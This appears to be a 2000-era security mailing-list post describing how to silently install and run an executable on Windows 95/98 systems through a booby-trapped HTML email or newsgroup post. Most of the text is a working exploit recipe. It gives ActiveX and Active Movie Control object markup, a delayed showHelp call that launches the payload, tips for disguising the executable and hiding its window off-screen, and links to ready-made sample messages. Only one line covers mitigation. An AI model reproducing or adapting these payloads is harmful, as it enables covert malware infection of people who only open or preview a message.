silent.delivery.txt

`Saturday, May 13, 2000  
  
MICROSOFT SECURITY FLAW?  
  
Silent delivery and installation of an executable on a target computer. No  
client input other than opening an email or newsgroup post.  
  
1. Using the following this can be accomplished with the default  
installation of Windows 95 and 98 and Internet Explorer 5 browsers and  
accompanying mail/news clients  
  
2. The key component from Georgi Guninski   
  
http://www.nat.bg/~joro/wordpad-desc.html  
  
3. Secondary component comprises a pre-installed ActiveX control directly  
from Microsoft. This control and a variety of similar demonstrations have  
been shown to Microsoft over 18 months ago  
  
What to do:  
  
A  
  
(a) Manufacture a *.chm file. The following kit from Microsoft is free and  
very easy to use Microsoft=AE HTML Help:  
  
http://msdn.microsoft.com/library/tools/htmlhelp/wkshp/download.htm  
  
(b) Construct a new *.chm file inputting the ActiveX link control as  
follows:  
  
<OBJECT id=3DAA classid=3D"clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"  
width=3D100 height=3D100>  
<PARAM name=3D"Command" value=3D"ShortCut">  
<PARAM name=3D"Button" value=3D"Bitmap:shortcut">  
<PARAM name=3D"Item1" value=3D",C:\WINDOWS\TEMP\MALWARE.exe,">  
<PARAM name=3D"Item2" value=3D"273,1,1">  
</OBJECT>  
  
<SCRIPT>  
  
AA.Click();  
</SCRIPT>   
  
(c) The control itself is quite sensitive to manipulation, the above  
represents the bare minimum to run.   
  
(d) Input the path of the executable you intend to run as in PARAM  
name=3D"Item1" above. In order to disguise the running of the executable it=  
is  
suggested to not to give it a silly name, rather something that is familiar  
to the operating system e.g. microsoftagent.exe etc.   
  
(e) While constructing the *.chm, it is possible to both minimise and offse=  
t  
the location of the *.chm file once opened. For example while under  
construction you can set the size of the help window and its location -  
using the auto resizer in Microsoft=AE HTML Help, drag the sizer to the  
smallest possible size. Although setting the size requires clicking OK  
inside the autosizer, dragging to minimal size and hitting ENTER will  
register the setting. Secondly offset the location of the file by inputting  
say 2000 , 2000, this should suffice in it opening off-screen on any size  
monitor.   
  
(f) Once you have compiled the *.chm test its functionality by placing the  
executable in your temp file and open the *.chm - it should run the  
executable.   
  
Now how do we place this on the target computer?  
  
B.  
  
(a) Simply by opening an email message or newsgroup post. The client does  
nothing. They receive an email open it or read a newsgroup post and that i=  
s  
all. Both the *.exe and *.chm are transferred silently and immediately to  
the temp folder once the email or newsgroup post is open.  
  
How so?  
  
(b) It is possible to embed almost anything in both html email and html  
news. Current versions of Outlook Express 5 inspect what is being embedded  
is in fact the correct file e.g. <img src=3D"abc.doc"> will not embed becau=  
se  
a *.doc is obviously not an image file. Internet Explorer 4 and accompanyin=  
g  
Outlook Express 4 does allow for this, similarly Netscape Messenger also  
allows for this. Nevertheless, through proprietary JavaScript and VBscript,  
it is possible to deliver an intact file to the target computer's temp  
folder, however with a file name given by the computer e.g. 000321.doc. Thi=  
s  
does not serve the purpose of running the *.chm with the file name explicit  
as above.   
  
(c) The Microsoft Active Movie Control (AMC) pre-registered and  
pre-installed on all Internet Explorer 5 computers does. The very simple  
scripting to do this is as follows:   
  
<OBJECT classid=3Dclsid:05589FA1-C356-11CE-BF01-00AA0055595A height=3D1  
style=3D"DISPLAY: none" width=3D1>  
  
<PARAM NAME=3D"Filename" VALUE=3D"C:\WINDOWS\DESKTOP\MALWARE.chm">  
  
<OBJECT classid=3Dclsid:05589FA1-C356-11CE-BF01-00AA0055595A height=3D1  
style=3D"DISPLAY: none" width=3D1>  
  
<PARAM NAME=3D"Filename" VALUE=3D"C:\WINDOWS\DESKTOP\MALWARE.exe">   
  
(d) This control too is very sensitive and the complete path must be  
inserted in order for it to embed in the html email message or html news  
post.  
  
(e) Finally, in the body of the html email or html news post the following  
simple JavaScript is required to set off everything:  
  
<SCRIPT>  
  
setTimeout('window.showHelp("c:/windows/temp/MALWARE.chm");',15000);  
  
</SCRIPT>  
  
Sufficient delay must be allowed for the news post or email message and  
transference of both the executable and *.chm files to be delivered to the  
target computers temp file before execution is called.  
  
What will happen?  
  
When the email or news post is opened, the embedded *.chm and *.exe will  
automatically and silently be transferred to the client temp folder, intact  
and with the given names. Default locations on all machines calls for the  
temp folder to be at C:\windows\temp. The AMC control, will deposit the two  
files to wherever the temp folder is located, if you have changed the  
location, these two files will still be delivered there, however because th=  
e  
*.chm file is constructed to seek out the *.exe in the default location, it  
will fail. Likewise so will the script in the html email message or news  
post. Hence, this will only work on default OS installs.   
  
Once the news post or email has been opened or even previewed via Outlook o=  
r  
Outlook Express preview pane, the two files are delivered to the temp  
folder, sufficient time elapses when the script in the html message calls  
the *.chm which opens silently and minimised in the task bar (because we  
have instructed it to open at the minimum size and off-set 2000, 2000), onc=  
e  
opened it, the ActiveX link control in it, runs the executable.   
  
Everything is instantaneous, no need for a reboot and no need for user  
interaction other than opening the email (or simply previewing it) or the  
newsgroup post. Needless to say once the executable is running, the damage  
is done. And no Windows Scripting Host (WSH) involved.   
  
The only solution is to relocate the temp folder and/or set scripting and  
ActiveX controls to the highest possible settings. The default settings do  
not ask for permission.   
  
Below represents a working example. The executable incorporated is a  
harmless joke program. In order to run it, save the entire example as eithe=  
r  
*.nws or *.eml and click on it:   
  
note: 1/ on high speed machines and i-connections with IE5, clicking the  
links below will allow for viewing of these news and mail files in the  
browser (technically known as mhtml), with the same effect. Slower machines  
and i-connections might want to save to disk and open from there.  
Additionally saving to disk and opening will allow for viewing in the mail  
or news client.  
  
note: 2/ it is not necessary to run this through html mail or news, applyin=  
g  
all the above directly on the web results in the same.  
  
Right-click and save to desktop  
  
Mail: http://members.xoom.com/malware/help.eml 89KB  
  
News: http://members.xoom.com/malware/help.nws 89KB  
  
  
  
  
`